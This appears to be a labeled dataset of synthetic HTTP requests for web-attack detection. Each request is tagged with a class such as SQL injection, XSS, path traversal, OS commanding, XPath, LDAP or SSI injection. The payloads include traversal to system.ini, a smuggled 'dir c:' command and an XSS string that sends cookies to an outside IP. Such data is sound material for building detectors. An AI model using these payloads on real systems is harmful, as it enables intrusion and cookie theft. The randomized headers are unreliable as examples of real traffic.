Date: Tue, 11 Nov 08 02:48:36 GMT
ETag: W/"dSxVpJqJiJ5FsSQ"
Expect: nqzigr6
If-Modified-Since: Fri, 21 Mar 08 05:14:29 UTC
If-Unmodified-Since: Sun, 31 Aug 08 14:10:20 UTC
If-Match: "r5VH7IeUZSNbq5CRl"
If-None-Match: "6YvzdbW-X6NGdOBHNng-"
If-Range: "X3njJk3dIh2ghSq-rtg"
Max-Forwards: 4959
MIME-Version: 1.5
Proxy-Authorization: NTLM aWllclB0eGFxaWJjbnllbHR0ZTdlNjVkM2VlaTNzdHR1dHRp
Authorization: Digest algorithm=aeaNemid
Referer: /kerhu/ayhmNe/ahEmr.jpg
TE: trailers
User-Agent: ore9 (eIapNDgpQw; onJnhDq; eFCb9l; eI4u5D-@Vc; lSdS184v)
UA-Disp: 387,609,32
Transfer-Encoding: deflate
X-Forwarded-For: 150.199.183.225
----: --------------------

itfneednePpO=u9esmocexnvmoa&nsdreity=253&endnwhanna=sQaKFkE&rmnnhAHlE@5vt=Mdi&hbeIeIssi8treEe=:bgsoundn6ertqi&GstyleLp=893

End - Id: 46009
Start - Id: 43797
class: OsCommanding
GET ..�../..�../mssql7/install/pubtext.bat" & dir c: .exe? HTTP/1.1
Host: 211.245.135.114:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 209.54.112.168
Cookie: mebhf=80906;Qbody.RE0irPzIiframe=henn3ume;67wP=dtoZ;tbBQ=ayc;poT3ne6orzw=i6yuo
Cookie2: $Version="3"
Date: Wed, 14 Jul 04 16:54:13 UTC
ETag: "4oKNvrNCIHYKhCU0chJP"
Expect: dhegnagd=62iivlh3;nnyeyrs=kyKh
From: qto7read@r8owxth.de
If-Modified-Since: Fri, 26 Jun 09 02:26:36 UTC
If-Unmodified-Since: Thu, 09 Mar 06 09:52:20 GMT
If-Match: *
If-None-Match: "NEFhk8stSSGPypUq1y"
If-Range: Thu, 28 Apr 05 19:22:49 CET
Max-Forwards: 202
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="h4nye"
Authorization: NTLM cnRlMkRrcmZjdnBpaU91YWRkbmVhYWdyaWkxdGFlYW1z
Range: 904036-,02113-35,44499-
Referer: /tegaesio/74chd4.js
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/8.7 (Machintosh; U; Mac OS X 7.1; af-5t; rv:0.9.8) Gecko/79117008
UA-CPU: Sparc
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 697x813
Via: FTP/0.9 46.63.122.3:505, 6.9 81.99.54.253:659
Transfer-Encoding: identity
Upgrade: Vsr3e/6.8
Warning: 815 www.nitmdae.gif "rfe4pvnricgalni" 
X-Forwarded-For: 203.135.237.55
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43797
Start - Id: 35210
class: SqlInjection
GET /5c-xq@O/nm5UOM436paquU/678euOssGwpp/aZDXMZg@/e@2Uda2p/rDYsZ.v/aRug5v2/lS/rS7/aNer0/_AOwMLa/eL2uKxKJDLerzLEKB.dll?d3h0XZ8PpgX=oo&ZCk4zdLU=eLdeoee%40h%7C&frh2iio=6ee+&cnezidgddtdr6hn=%27select+customer_phone++%27%7C%7C%27from+++++customers+++++%27%7C%7C%27where+++customer_surname%3D%27%27%27%7C%7C+lv_surname%7C%7C%27%27%27+++and++++customer_type%3D1%27%3B&sepiesd=raMU%40s%40O&umoyuaaanooA1nt=32&e60ptxmlyndsr=tw-oee4a&ivemnehijesar=tqdli&tsa2=72470&ew8isops7bk=857 HTTP/1.0
Host: www.oizao.ch
Connection: keep-alive
Accept: video/quicktime, text/*;q=0.3, image/*
Accept-Charset: iso-2022-kr;q=0.1, iso-8859-1
Accept-Encoding: 
Accept-Language: etshl-c;q=0.9
Cache-Control: no-cache
Client-ip: 247.223.116.97
Cookie: syebryfS2eyesl=5686346825;geeiu=gi;mitodppiasxi2f=it9pMzevn2hsiodfy1;nne=841811
Cookie2: $Version="8"
Date: Fri, 05 Dec 08 12:05:27 UTC
ETag: "osdX6lLH@4A8bU-Sr0"
Expect: duapjRis=awoeo;l1m7=3t6n
From: 1sbtaan@lile.com
If-Modified-Since: Mon, 14 Dec 09 22:24:31 CET
If-Unmodified-Since: Mon, 21 Dec 09 01:11:12 CET
If-Match: "_LaY3b0Sp0D@khE-OU"
If-None-Match: "P0A0DIGT3amurqGmRtiB"
If-Range: Fri, 04 Jan 08 08:25:06 CET
Max-Forwards: 34
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic RmVacGU6cmFzQQ==
Authorization: Basic aGVkQlZicGk6ZGFoZA==
Range: -30216,36258-
Referer: http://nrcnt9i.gov/e25whyoe/hpuc.mpg
TE: trailers,trailers,gzip
Trailer: If-Match
User-Agent: Mozilla/5.1 (Machintosh; U; PPC Mac OS X 9.3; ea-td; rv:8.5.5) Gecko/12841589
UA-CPU: Sparc
UA-Disp: 601,1500,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: AoiaH/8.5 www.jmbewe.htm, radkp/7.2 www.naaMsp.css, 9.8 www.Kiihi.html
Transfer-Encoding: deflate
Upgrade: satc/9.3, dlwu/4.3, ras/0.6, hmrcOE/0.0
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 123.169.83.240
X-Serial-Number: 653794992925901
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35210
Start - Id: 36472
class: OsCommanding
GET /scripts/georgi.asp/..��..��..��file.ext? HTTP/1.1
Host: 151.18.1.46
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: egpwnm-dEq, l-229ach, sta7iNha-u, pi-jhtRrwet, anitf-f
Cache-Control: no-store
Client-ip: 82.121.154.204
Cookie: lcqhdrhtcrha5yl=n0rptheohgioesoin4;NWEE0g.jmconnectSr=eon69is;waeaeieithme=osock_streamm;a8=ei0B;hia4eEieteHrahh=osqsnat8
Cookie2: $Version="987"
Date: Sun, 04 May 08 16:06:45 CET
ETag: "eHNFlmWlO@M8y5SACU7"
Expect: 100-continue
From: n8us@72HjX.ch
If-Modified-Since: Mon, 04 Jul 05 22:45:41 GMT
If-Unmodified-Since: Sat, 03 Jun 06 24:36:41 GMT
If-Match: "8OnkzvC1RzRx8rNmi"
If-None-Match: "ftxI4pouqoptlt6q"
If-Range: *
Max-Forwards: 436
MIME-Version: 8.8
Pragma: wdlddr='EhEx'
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: mboo tsamn=pSloinp
Range: 57-,410056-,436232-1281
Referer: /ob9shrea.cgi
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/2.7 (X11; U; SunOS sun4u 9.7; Vs-eS; rv:5.5.7) Gecko/59091109
UA-CPU: Sparc
UA-Disp: 8174,3331,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1357x6667
Via: HTTP/7.5 250.189.133.153
Transfer-Encoding: identity
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 407 57.211.128.3 "iUaiaecen" "Mon, 03 Nov 08 07:27:24 UTC"
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 937987877
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36472
Start - Id: 45498
class: PathTransversal
GET /26.php3?eFzxIpsa5taB0s=nnc&lzl=tefgh++dUaenq%28ic+aT&i6e=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&aeisoetso=wYh&gnIaeyottgRu=m HTTP/1.0
Host: 191.82.250.202:80
Connection: keep-alive
Accept: image/*;q=0.8, audio/basic, application/postscript;q=0.5
Accept-Charset: euc-jp, iso-2022-jp;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: jaaeatss='nhm'
Client-ip: 165.251.254.128
Cookie: ts3em8isieacyrh=cn1twM;pk=htotT1e2+Di0xmludixh;d0usstoetOr=F/P><loehtftnaa5o%
Cookie2: $Version="629"
Date: Fri, 10 Aug 07 15:05:56 UTC
ETag: "SQQiLGzppLASCU-m"
Expect: shtTeapd=s0or6;ewio3=nsoo
From: rddIbt@n7reian.st
If-Modified-Since: Wed, 18 May 05 16:55:13 GMT
If-Unmodified-Since: Sun, 01 May 05 03:29:42 CET
If-Match: *
If-None-Match: "4yTK-H7tYbnMD_Fz"
If-Range: "WJuNZph3I_LEhQN8"
Max-Forwards: 42
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic b2Rlcmw6cEVobFN1aHM=
Authorization: ftsb tthhtw=otis
Range: 20-48,0-277881
Referer: /lEto/ngytl/lheoP/ecsradiw/x4eGttts.mdb
TE: trailers,gzip;q=0.7,deflate;q=0.8
Trailer: Upgrade
User-Agent: sUTJJ6QkK http://www.tesyhea.it
UA-CPU: MIPS
UA-Disp: 3246,785,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 6084x210
Via: 8.0 9.172.27.77, HTTP/8.6 www.hhlqse.png, 9ti/3.8 54.63.61.109
Transfer-Encoding: deflate
Upgrade: dBhiia/6.0
Warning: 882 118.217.63.222 "etpoiZeexEopAili8v" 
X-Forwarded-For: 62.58.132.17
X-Serial-Number: 8223453
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45498
Start - Id: 47022
class: XSS
GET /aetSsletsaeio4a3/1X/oNQ1.cgi?d92denpari9iaeu=410&tyhpiref=gd1egttfle6ndeen&at3Tb2Leor=%3Cdiv+style++%3D++%22++++background-image%3A+url%28javascript%3A%5Bwindow.open%28%27http%3A%2F%2F175.61.196.229%2Fie.php4%27%2Bdocument.cookie%29%3B%5D%29%3B+++++%22+++%3E&at3da=r+dfs0bodymsuboot.inins&4NoW.=eIc-db3Uz&c9fzjF=Hgt1&rftsyuU=1ehw&1oLditqnted6zm=input&e5=nDsbuydf2qtugcbpe&tesrltbo=eh&.fx@0NTec=se&0b=%7C+&nsett=r HTTP/1.0
Host: www.soso.com
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-chinesesimp;q=0.9, koi8, windows-1253, windows-1250;q=0.9
Accept-Encoding: 
Accept-Language: uNra2at-Et1
Cache-Control: no-store
Client-ip: 113.178.205.82
Cookie: ecbojf=8libautoexec;VcXS1L1XzkP=wlirF1;aaoexsidoDTa=64413;euFtYc=elWpbw_;nn0dheto=453
Cookie2: $Version="206"
Date: Fri, 13 Nov 09 13:49:31 UTC
ETag: W/"iBHbcwj83EfCfSa5F3W"
Expect: ntsa=smauIax;uoyhoS=rns3ee
From: Desiah@eghc.be
If-Modified-Since: Fri, 20 Aug 04 21:56:04 CET
If-Unmodified-Since: Wed, 12 Oct 05 19:12:48 GMT
If-Match: "ieVx5xDcPhI6G.O-4n"
If-None-Match: "uVTHARtNL_cVo4-YO"
If-Range: *
Max-Forwards: 412
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: guaey ansi2ou=Anhkil5
Authorization: Digest opaque="iLcEe"
Range: 72764-,7458-792763,4112-2767
Referer: /5SpwsNq/ele0fei0/9bhnehR/e9bin5wt.asmx
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.2 (compatible; MSIE 4.4; Mac OS X; nuu3t; yaflrerozt; 6h3r7siew)
UA-CPU: MIPS
UA-Disp: 5519,887,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7231x6416
Via: s3t/8.4 172.50.191.192
Transfer-Encoding: identity
Upgrade: pil1/7.3, dxAvc/4.0
Warning: 814 www.sz2gl.html "et0hhawps" "Sun, 03 Feb 08 08:33:56 UTC"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 239527167
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47022
Start - Id: 45544
class: PathTransversal
GET /jewrgirx/j4Z.StaR8etcYwY/2e4i4qe/netgee5agpvee/Ci1JWFhBiZPqphp2/nSFxqVh/lhziEa7v.php?rAieraKessu=6o+e%29t66eo%7Eexec+%7C&wrtodi=tnrwsod8&Vomrchsmn0a=le%3Cx%25&ats=vuokh%3D&itnern7nrffsz=%7Crclogkdi&wnupttthea=h&tg67nhgctsio=mij&on9otota3h=852&knoheiideen=4emetali+d&rVeI=+wp-u&.6Kog1E=70&Eho=leS1tA4Tenh&ffnlrno9ntFKca3=tW&m9rmZbodymFbCv0=r&x5-gvarDhomes=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat HTTP/1.1
Host: 233.20.238.97:34
Connection: close
Accept: application/rtf;q=0.8, audio/*;q=0.1
Accept-Charset: koi8, iso-8859-8-i, iso-8859-1;q=0.8, x-mac-arabic;q=0.0, windows-1250;q=0.9
Accept-Encoding: deflate, deflate;q=0.1, deflate;q=0.1, deflate;q=0.4, deflate;q=0.3
Accept-Language: ro-sUf;q=0.7, ni-0ins;q=0.5, kib-lwaqf;q=0.3, dnp3tb4n-kN2;q=0.7, tg7-ao;q=0.9
Cache-Control: max-age=946
Client-ip: 189.238.147.1
Cookie: hzrArkq=a q;Ihnsiln=7324;tDteebs2=kf@Ch2bew
Cookie2: $Version="65"
Date: Sat, 07 Oct 06 21:30:48 UTC
ETag: W/"YEA5XlA3hHt4Q.Yl9_"
Expect: 100-continue
From: hwpha@Suan.org
If-Modified-Since: Sat, 06 Aug 05 09:55:35 UTC
If-Unmodified-Since: Sat, 06 Mar 10 07:01:12 GMT
If-Match: "v1JcWPbHSR.h.N9NyA"
If-None-Match: *
If-Range: Mon, 25 May 09 02:58:15 GMT
Max-Forwards: 57
MIME-Version: 3.3
Pragma: i5H2n='hkcuc'
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: NTLM dmFzZm1ua29vT3NjZW5mZHd0ZXJ0YWFzOERsdWlKZVR1Z2NuY3JrbzBy
Range: 903-3,3-4324,-8
Referer: /sdSekd/wrraybha/powh.tar
TE: deflate;q=0.6,trailers,trailers
Trailer: Accept-Language
User-Agent: deelj (hqy7hfhyB-; hqgot7PvF; uH0tP_aow)
UA-CPU: 68000
UA-Disp: 6548,353,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 220x9820
Via: HTTP/4.3 www.wnnwiisi.html, FTP/8.4 205.228.24.78:45
Transfer-Encoding: deflate
Upgrade: vleih/1.8, zzq/8.8, etwstn/4.5, eseo/9.8, ilezr/6.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 145.196.47.34
X-Serial-Number: 86157391207979195
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45544
Start - Id: 42689
class: SqlInjection
PUT /nr0sehns/drLj/eorr0u6ibvA/irjnt9mdtweac/-w9zX2fDd2/eE.jpg? HTTP/1.0
Content-Length: 74
Content-Language: Tkbtrr8m,aiee8h9,ksO
Content-Encoding: gzip
Content-Location: /or52fmle/E7ee498.png
Content-MD5: YXN2NzFmMnJkcEFoaUlMcQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Oct 07 04:21:51 CET
Last-Modified: Tue, 06 Nov 07 03:40:48 GMT
Host: www.eToevi.st:80
Connection: close
Accept: audio/*
Accept-Charset: iso-8859-2, windows-1258, iso-8859-2, iso-8859-4, x-mac-hebrew
Accept-Encoding: %27+%2F**%2F++++OR+%2F**%2F+%27km0On%27+%3E+++++%27S
Accept-Language: *;q=0.0
Cache-Control: max-stale=7473
Client-ip: 88.209.41.196
Cookie: afxzy=je+tt%3E%3AGat%27%24%7Cf+so;Twindow.openHLftZnY%u.=ijbZS6q;haosaoTh7sT=mafogtoslq;varnaoioas=86790621;7hihmhdA1=31233;cra=4agyy7meeAzfEm4n
Date: Mon, 15 May 06 12:28:43 GMT
ETag: "lAKu3stMNrcRMMPT6"
Expect: 2rerajnn=llDcy0Nh
From: ntoittcr@aetm8itm.uk
If-Modified-Since: Mon, 29 May 06 16:01:08 CET
If-Unmodified-Since: Wed, 17 Aug 05 02:44:50 GMT
If-None-Match: *
If-Range: Wed, 21 Nov 07 10:03:55 UTC
Max-Forwards: 0773
MIME-Version: 2.2
Pragma: ea8swsrh=7ih0
Proxy-Authorization: NTLM NGFyNHRxbjRlc3RlNGFvcjRlOW9ybGxodHdlZ2lkOGhnaGk=
Authorization: NTLM bmJTbk9pZWF5Z3Rlc2FlbnJla2lvbDFybDVhdHRmaTBZZW44aWZuaG9JZTdl
Referer: http://www.tiOtd.org/ne2astt.gif
TE: chunked,trailers,trailers
User-Agent: 5booCorhiairsr
Via: HTTP/3.5 222.117.162.130, HTTP/4.5 115.176.29.208
Transfer-Encoding: deflate
Upgrade: di2/3.5, 6tBsi/4.2
Warning: 766 www.raittgp6.gif "naie" 

ESYJ=ooEmi&eea=oi&ai0uncayc=t<a9 aelocationc)&tdek1te6booux=0274932970

End - Id: 42689
Start - Id: 48362
class: XPathInjection
GET /pWjSetc/b5GQsKUKio6/1Cqg/nYPTLk/thycvhf8e/ontWDHeuNZ/mdihVi1Ben/hwkDQWjAp.JeS-.css? HTTP/1.1
Host: www.obco.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: esteno9'     or   count(  path/child::node()[position(   )=((    i    +   j    +   k    +   l+1)]  |   path/child::*()[position()=(k+1)])=1  or  'tamo' = '   bqdhia9o'     or
Cache-Control: eno=m5eeml
Client-ip: 51.200.99.156
Cookie: tet6ufkotl=ihtlLE4dntaut
Cookie2: $Version="6"
Date: Wed, 22 Sep 04 13:40:27 CET
ETag: "BHaSt0red.1BIjqc"
Expect: thOy7e=Ytrrd
From: hbsayoi@ert2nes.cz
If-Modified-Since: Tue, 29 Jun 04 04:26:19 GMT
If-Unmodified-Since: Sun, 26 Aug 07 09:33:13 UTC
If-Match: "RzSdyre9BosrqWl_qo"
If-None-Match: *
If-Range: Sun, 12 Sep 04 10:02:34 UTC
Max-Forwards: 383
MIME-Version: 4.9
Pragma: diotn='rrg'
Proxy-Authorization: Basic M2xyZWV1dDplb2kw
Authorization: orxntl 0our=jhutit
Range: 42-898,3033-93205
Referer: http://www.1iTnc.org/aviyF/pewq.htm
TE: trailers
Trailer: Accept
User-Agent: ttlue6ny (th6hB1RWeL; e7cCC.0XjT; m8zUeatQ; p6kxy55Ca; 0yYO2L)
UA-Disp: 761,406,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 968x897
Via: 7.0 187.8.107.149, 7.4 126.106.194.76, FTP/0.4 www.nacq.gif
Transfer-Encoding: identity
Upgrade: s4jf/0.3, eel/4.5, A5ooh7/7.4, Hnyzt/6.0
Warning: 837 147.54.34.5 "IinnttmopneddCTh1s2r" "Tue, 02 Mar 10 09:48:09 CET"
X-Forwarded-For: 152.22.134.108
X-Serial-Number: 2527900
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 48362
Start - Id: 49424
class: XPathInjection
GET /0a1.Oaccess_logX9IzhttpsF9QM.jsp?isajrot=so2ia%27%5D++%7C+P++++%7C+++%2F%2Fuser%5B++++name%2Ftext%28+++%29++%3D+++%27eerf&uchnAeflnttetvE=m%3FptluyEl%2Fd%29rq&x7tA=50&7sein2g4a=1oservicesitr4aksR%27nH%40eoA&iesnnfrrd=rhnohvnpnemefm&mjorrTHaob8=imeta&MokuT0KoNNsv=atG&lmhKeme0SHcaa=78 HTTP/1.0
Host: 116.248.255.2
Connection: keep-alive
Accept: */*
Accept-Charset: euc-jp;q=0.9, x-mac-korean, cp-932;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: d='iq'
Client-ip: 93.18.190.156
Cookie: ahpwan2smsrced=ieyehHn;nDnnH5dnoThredo=tr;mtar9d='winntpasswd)tpie/cermwgetatNde;toasEoitzUEnos=k;nc8ou8=trx$i
Cookie2: $Version="722"
Date: Fri, 24 Jul 09 04:41:00 GMT
ETag: "9EJy05E0HvEXhGvYe"
Expect: 8Usetdir
From: lyE3Znu@romta.biz
If-Modified-Since: Sat, 25 Jul 09 09:05:12 UTC
If-Unmodified-Since: Sat, 25 Oct 08 01:35:51 CET
If-Match: "KcPEIEblBQ-CmKz_cXNo"
If-None-Match: "DH14wSY@1m_Vmjij6"
If-Range: Sat, 13 Feb 10 22:24:05 UTC
Max-Forwards: 596
MIME-Version: 0.6
Pragma: 8OcST='hE'
Proxy-Authorization: Digest nonce
Authorization: Basic dGV0aTpzVHJj
Range: -32,-92418
Referer: http://yOrgtNs.org/denovo3i/ikrr.exe
TE: chunked;q=0.9,deflate;q=0.6,trailers
Trailer: Warning
User-Agent: etbP0 (35_r3I4; eK6YHCphUl; cTNu@n; g8C-1Roa@e; iljHtwo0e)
UA-CPU: StrongARM
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 510x653
Via: FTP/9.9 109.241.36.3, 5.2 207.178.238.174, FTP/1.6 235.182.96.233
Transfer-Encoding: compress
Upgrade: 7wfie/1.9, qn3h0/6.3, fiEx/5.9, lho/6.1
Warning: 168 www.mBsttTo.jpg "zsvb" "Fri, 02 Nov 07 10:06:41 UTC"
X-Forwarded-For: 43.207.47.88
X-Serial-Number: 812184590933752195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49424
Start - Id: 38024
class: LdapInjection
GET /b_yB1-SyeR7Oc/njE8/eoa5ii/dgen/Guktw/RDHSall3/neN1ye2Q.shtml?ugmedp=on67s%29%28%26%28objectClass++++%3D+++rtg3*%29&kWobjectchttps7=e%5DeDl&nBPFOFAqlXJ=17512634&ovmCess=Ahy%2F%40null3&TlDturou=es&67emhtaccesvbscriptQdrop=nruobjectl&rCmB=%29homeii HTTP/1.0
Host: 62.182.204.76:19
Connection: aDmep2o
Accept: */*;q=0.5
Accept-Charset: macintosh, iso-8859-5, big5;q=0.0, x-mac-chinesetrad;q=0.5, koi8
Accept-Encoding: identity;q=0.4, identity;q=0.4, deflate;q=0.7, gzip, deflate;q=0.0
Accept-Language: *;q=0.9
Cache-Control: arftfei='E61abr7c'
Client-ip: 252.123.213.7
Cookie: a5eorlare9t5di=( syoc[mhm;PjhUZconnectjJservices0z=tu;Ahaving4R=e4-lwSeertka;cselu5=9802822;ai3R=eaoawdtltlrycoi;lmjMbewt=o
Cookie2: $Version="157"
Date: Sat, 05 May 07 06:48:26 CET
ETag: "c@9mSDK4Mtu5MpRA24Q_"
Expect: eaes4=oetnrgT
From: llnexttR@tod6.biz
If-Modified-Since: Fri, 16 Apr 10 13:39:15 CET
If-Unmodified-Since: Mon, 22 May 06 09:03:38 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 06 Mar 04 13:42:52 CET
Max-Forwards: 5594
MIME-Version: 8.2
Pragma: oteoit='rauSr'
Proxy-Authorization: ziaee2 vttV0aet=bileft6
Authorization: Basic Y2RvOGF0NG46aXN6Y2lF
Range: -044639,-6732
Referer: /fiEe/ehrlt/ihhhoce.mdb
TE: trailers
Trailer: Cache-Control
User-Agent: dsES3wnsjb6
UA-CPU: Sparc
UA-Disp: 2707,126,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 427x816
Via: FTP/4.6 129.247.36.140
Transfer-Encoding: deflate
Upgrade: aol/0.7, dxme/6.7, otfplt/6.5
Warning: 387 34.107.120.26 "eds5WnaDitshnsboeba" "Sun, 22 Jan 06 09:42:50 CET"
X-Forwarded-For: 195.229.142.172
X-Serial-Number: 94095568311644
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38024
Start - Id: 41262
class: SqlInjection
GET /8ZmZqxm8RedOic/pzZ/oaar.sh?@H_1MF-all7=a&ePnrbojceid=538673&Szlocationselect3lib1Iiy2o=52417973&vE3axBfromZ=+%5Ch%3Ca&sidps=6&dropUX1WxCpBPAL=6vW&RpISwgetv=nHiwL%40welO&ti8er5f=2&8awtHIsucsp0f=der0aectghqTdqat&lsdafgsdoniarj=u+h+s7it%7Ewe0&ol7einrenN1dvtr=a&iinai=9dnh&feib7=shu4bed HTTP/1.0
Host: www.4totny.fr
Connection: close
Accept: text/xml, audio/*, audio/basic
Accept-Charset: us-ascii, euc-tw, windows-1254
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.6
Cache-Control: min-fresh=622
Client-ip: 160.158.246.167
Cookie: segw4s9='select     customer_phone '||'from    customers  '||'where customer_surname='''||    lv_surname||'''     and customer_type=1';
Cookie2: $Version="540"
Date: Sun, 24 Sep 06 17:29:28 GMT
ETag: W/"4byGeaXhYtAs85QO"
Expect: 100-continue
From: sadkb6h@raise.cz
If-Modified-Since: Wed, 26 Apr 06 06:57:06 CET
If-Unmodified-Since: Thu, 10 Jul 08 14:08:45 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9647
MIME-Version: 5.3
Pragma: M5tteyh='ain'
Proxy-Authorization: Digest username="htctmgeT"
Authorization: eearpi ssb7=l8tn0der
Referer: /dpGjEnsa/asopyda/3ceuh5h/lrsirt/lOVBet.aspx
TE: gzip;q=0.7,trailers
Trailer: Max-Forwards
User-Agent: ceihtivjz (rEOLnF; sjOi5bvq)
UA-OS: Win9x
Via: 5.9 200.252.40.231, HTTP/0.8 www.fwmm.shtml:932
Transfer-Encoding: identity
Upgrade: tlgr/4.4, ljio/8.8, tl6ref/8.3, pae/1.6, eT90bs/9.1
Warning: 817 72.49.197.250 "aaiRrhhdn7ereiwNo" "Sat, 24 Jun 06 23:26:54 UTC"
X-Forwarded-For: 31.90.227.178
X-Serial-Number: 85418
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41262
Start - Id: 35633
class: XPathInjection
GET /aUtjHv.php4?ogmoPii9sd=systemotm%3B%3Fd0ao&sRhemoefT=ewVF.Dik&dzbaormvsuaoee=douhaBaon5grhins&vhavingFhNdiv9=iiey2St%27+++or+++++%28i++++%3C++count%28dn%2Fchild%3A%3Atext%28%29%29+++and+++j+%3C+++count%28rEst%2Fchild%3A%3Acomment%28%29%29++and+++k++%3C+count%28aye%2Fchild%3A%3A*%29+++%29++++or+++%27r6oqhl%27+++%3D+%27++++hbre%27+++or&AFnfdEuxvSiieni=7teaa HTTP/1.0
Host: 101.34.177.29
Connection: close
Accept: text/xml;q=0.6, video/mpeg;q=0.1
Accept-Charset: big5, iso-8859-3;q=0.7, x-mac-turkish;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-age=25290
Client-ip: 108.171.74.43
Cookie: B9eiFyutj=oe/d+j2eey1trI 
Cookie2: $Version="248"
Date: Sun, 13 Jul 08 08:49:47 CET
ETag: W/"MtaA7VKLaZIKhkEV"
Expect: MaheEaa=jmnFein;sneisk=ieirsrvw
From: rzin8cri@efHTe5.be
If-Modified-Since: Sun, 02 Jul 06 22:53:33 CET
If-Unmodified-Since: Mon, 23 Oct 06 12:40:57 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 03 Feb 10 04:29:02 GMT
Max-Forwards: 285
MIME-Version: 6.3
Pragma: ih='grh'
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: Digest cnonce="tnexai"
Range: -38,162-85,-031
Referer: http://www.z0Jyitst.st/sXil5y/rf4GfV/seuankeL/neohaee1.avi
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Mozilla/2.4 (X11; U; Solaris 0.5; dU-nT; rv:0.8.7) Gecko/54112139
UA-CPU: Sparc
UA-Disp: 458,730,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 251x7424
Via: 7.6 www.oxfmgklo.tiff
Transfer-Encoding: gzip
Upgrade: gjLviy/4.9, dhine/5.3, iwnIgr/0.1, vSh4/5.9
Warning: 986 www.rBnsrcl.html "5cdarlosaE" 
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 587545
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35633
Start - Id: 40534
class: SSI
GET /oFB0q1KIqkcVKMmeCjN/tT0n1QlJ3Aq9zV/phpL1cDAzUppspfp/rMCKX/tutachea/cyoztl8tesumwtl9iyeu.dll?t48Mn=%3C%21--+++++%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++--%3E&ths=62602 HTTP/1.0
Host: www.tstowkafYv.be
Connection: keep-alive
Accept: video/mpeg;q=0.5, video/quicktime;q=0.2
Accept-Charset: x-mac-greek, iso-8859-5, koi8;q=0.4
Accept-Encoding: gzip;q=0.8, gzip, gzip, gzip;q=0.1, compress;q=0.1
Accept-Language: hsiamig-n;q=0.6, avhrhyE-scT, r6en-nodde1el
Cache-Control: no-transform
Client-ip: 233.63.57.74
Cookie: pkOHbsdi=a;4xekxlVdqab=0httpsd;MNzsystemqYJZ=e/S
Cookie2: $Version="326"
Date: Fri, 15 Jan 10 02:08:18 GMT
ETag: "AfcdCSnakAcyeEBs"
Expect: 1sirvmcl=R4nloji;dsonoe=nmaoUt
From: phta9t@exney5i.com
If-Modified-Since: Sat, 28 Mar 09 23:45:20 CET
If-Unmodified-Since: Thu, 06 Aug 09 24:01:04 GMT
